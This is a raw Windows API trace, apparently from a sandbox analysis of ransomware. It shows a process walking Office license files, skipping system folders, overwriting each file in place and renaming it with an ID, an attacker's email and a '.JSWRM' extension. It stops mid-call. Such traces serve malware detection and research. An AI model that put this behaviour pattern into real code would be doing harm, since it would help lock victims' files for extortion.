[0104.731] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription2-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription2-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription2-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription2-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0104.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0104.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0104.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.732] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5a631e9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5a631e9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe5b47f19, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x67ad, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_Subscription2-ppd.xrm-ms", cAlternateFileName="O36B97~1.XRM")) returned 1 [0104.732] lstrcmpiW (lpString1="O365HomePremR_Subscription2-ppd.xrm-ms", lpString2=".") returned 1 [0104.732] lstrcmpiW (lpString1="O365HomePremR_Subscription2-ppd.xrm-ms", lpString2="..") returned 1 [0104.732] lstrcmpiW (lpString1="O365HomePremR_Subscription2-ppd.xrm-ms", lpString2="...") returned 1 [0104.732] lstrcmpiW (lpString1="O365HomePremR_Subscription2-ppd.xrm-ms", lpString2="windows") returned -1 [0104.732] lstrcmpiW (lpString1="O365HomePremR_Subscription2-ppd.xrm-ms", lpString2="recovery") returned -1 [0104.732] lstrcmpiW (lpString1="O365HomePremR_Subscription2-ppd.xrm-ms", lpString2="perflogs") returned -1 [0104.732] lstrcmpiW (lpString1="O365HomePremR_Subscription2-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0104.732] lstrcmpiW (lpString1="O365HomePremR_Subscription2-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.732] lstrcmpiW (lpString1="O365HomePremR_Subscription2-ppd.xrm-ms", lpString2="system volume information") returned -1 [0104.732] lstrcmpiW (lpString1="O365HomePremR_Subscription2-ppd.xrm-ms", lpString2="msocache") returned 1 [0104.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0104.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription2-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0104.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription2-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22ce70, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_Subscription2-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0104.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0104.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0104.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription2-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0104.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription2-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22d0a0, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_Subscription2-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0104.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0104.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0104.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0104.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0104.733] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription2-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription2-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.734] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=26541) returned 1 [0104.734] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x67a0) returned 0x24c1d0 [0104.734] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x67a0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x67a0, lpOverlapped=0x0) returned 1 [0104.740] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.740] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x67a0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x67a0, lpOverlapped=0x0) returned 1 [0104.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.741] CloseHandle (hObject=0x45c) returned 1 [0104.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0104.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0104.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0104.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0104.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0104.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f970 [0104.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0104.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0104.741] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription2-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription2-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription2-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription2-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0104.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0104.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0104.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.742] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5a631e9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5a631e9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe5b94335, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d83, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_Subscription2-ul-oob.xrm-ms", cAlternateFileName="O381C0~1.XRM")) returned 1 [0104.742] lstrcmpiW (lpString1="O365HomePremR_Subscription2-ul-oob.xrm-ms", lpString2=".") returned 1 [0104.742] lstrcmpiW (lpString1="O365HomePremR_Subscription2-ul-oob.xrm-ms", lpString2="..") returned 1 [0104.742] lstrcmpiW (lpString1="O365HomePremR_Subscription2-ul-oob.xrm-ms", lpString2="...") returned 1 [0104.742] lstrcmpiW (lpString1="O365HomePremR_Subscription2-ul-oob.xrm-ms", lpString2="windows") returned -1 [0104.742] lstrcmpiW (lpString1="O365HomePremR_Subscription2-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0104.742] lstrcmpiW (lpString1="O365HomePremR_Subscription2-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0104.742] lstrcmpiW (lpString1="O365HomePremR_Subscription2-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0104.742] lstrcmpiW (lpString1="O365HomePremR_Subscription2-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.742] lstrcmpiW (lpString1="O365HomePremR_Subscription2-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0104.742] lstrcmpiW (lpString1="O365HomePremR_Subscription2-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0104.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0104.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription2-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0104.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription2-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22d260, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_Subscription2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0104.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0104.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0104.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription2-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0104.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0104.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription2-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22d298, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_Subscription2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0104.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0104.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0104.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0104.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0104.743] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription2-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.743] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11651) returned 1 [0104.743] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d80) returned 0x24c1d0 [0104.743] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d80, lpOverlapped=0x0) returned 1 [0104.745] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.745] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d80, lpOverlapped=0x0) returned 1 [0104.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.746] CloseHandle (hObject=0x45c) returned 1 [0104.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0104.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0104.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0104.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0104.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0104.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0104.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.746] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription2-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription2-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription2-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0104.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0104.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0104.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0104.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.747] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe59a44ee, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe59a44ee, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe5ad5847, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bbf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_Subscription3-pl.xrm-ms", cAlternateFileName="O3FF0E~1.XRM")) returned 1 [0104.750] lstrcmpiW (lpString1="O365HomePremR_Subscription3-pl.xrm-ms", lpString2=".") returned 1 [0104.750] lstrcmpiW (lpString1="O365HomePremR_Subscription3-pl.xrm-ms", lpString2="..") returned 1 [0104.750] lstrcmpiW (lpString1="O365HomePremR_Subscription3-pl.xrm-ms", lpString2="...") returned 1 [0104.750] lstrcmpiW (lpString1="O365HomePremR_Subscription3-pl.xrm-ms", lpString2="windows") returned -1 [0104.750] lstrcmpiW (lpString1="O365HomePremR_Subscription3-pl.xrm-ms", lpString2="recovery") returned -1 [0104.750] lstrcmpiW (lpString1="O365HomePremR_Subscription3-pl.xrm-ms", lpString2="perflogs") returned -1 [0104.750] lstrcmpiW (lpString1="O365HomePremR_Subscription3-pl.xrm-ms", lpString2="documents and settings") returned 1 [0104.750] lstrcmpiW (lpString1="O365HomePremR_Subscription3-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.750] lstrcmpiW (lpString1="O365HomePremR_Subscription3-pl.xrm-ms", lpString2="system volume information") returned -1 [0104.750] lstrcmpiW (lpString1="O365HomePremR_Subscription3-pl.xrm-ms", lpString2="msocache") returned 1 [0104.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0104.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription3-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0104.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription3-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_Subscription3-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0104.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0104.751] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0104.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription3-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0104.751] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription3-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d0a0, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_Subscription3-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0104.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0104.751] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0104.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0104.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.751] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0104.751] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription3-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription3-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.751] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11199) returned 1 [0104.751] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.751] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bb0) returned 0x24c1d0 [0104.751] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bb0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bb0, lpOverlapped=0x0) returned 1 [0104.754] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.754] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bb0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bb0, lpOverlapped=0x0) returned 1 [0104.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.754] CloseHandle (hObject=0x45c) returned 1 [0104.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0104.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0104.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 